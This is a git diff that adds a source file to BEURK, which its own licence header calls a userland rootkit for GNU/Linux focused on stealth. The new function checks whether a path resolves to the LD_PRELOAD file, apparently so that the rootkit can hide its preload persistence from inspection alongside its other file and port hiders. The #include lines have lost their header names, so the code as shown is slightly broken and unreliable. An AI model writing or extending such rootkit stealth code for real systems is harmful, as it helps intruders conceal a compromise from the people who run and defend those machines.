diff --git a/Makefile b/Makefile
index 06e0374..9225bd2 100644
--- a/Makefile
+++ b/Makefile
@@ -33,6 +33,7 @@ SOURCES = src/init.c \
src/config.c \
src/debug.c \
src/is_hidden_file.c \
+ src/is_ld_preload_file.c \
src/is_attacker.c \
src/is_procnet.c \
src/hide_tcp_ports.c \
diff --git a/src/is_ld_preload_file.c b/src/is_ld_preload_file.c
new file mode 100644
index 0000000..1a71577
--- /dev/null
+++ b/src/is_ld_preload_file.c
@@ -0,0 +1,42 @@
+/*
+ * BEURK is an userland rootkit for GNU/Linux, focused around stealth.
+ * Copyright (C) 2015 unix-thrust
+ *
+ * This file is part of BEURK.
+ *
+ * BEURK is free software: you can redistribute it and/or modify
+ * it under the terms of the GNU General Public License as published by
+ * the Free Software Foundation, either version 3 of the License, or
+ * (at your option) any later version.
+ *
+ * BEURK is distributed in the hope that it will be useful,
+ * but WITHOUT ANY WARRANTY; without even the implied warranty of
+ * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+ * GNU General Public License for more details.
+ *
+ * You should have received a copy of the GNU General Public License
+ * along with BEURK. If not, see .
+ */
+
+#include /* PATH_MAX */
+#include /* realpath(), free()*/
+#include /* strcmp() */
+#include "beurk.h" /* prototype */
+#include "config.h" /* FILE, MAX_LEN, MAGIC_STRING, LIBRARY_NAME, ... */
+#include "debug.h" /* DEBUG() */
+
+
+int is_ld_preload_file(const char *file) {
+ init();
+ DEBUG(D_INFO, "called is_ld_preload_file()");
+
+ char *path;
+ int ret;
+
+ path = realpath(file, NULL);
+ if (path == NULL)
+ return 0;
+ ret = !strcmp(path, LD_PRELOAD);
+ free(path);
+ return ret;
+}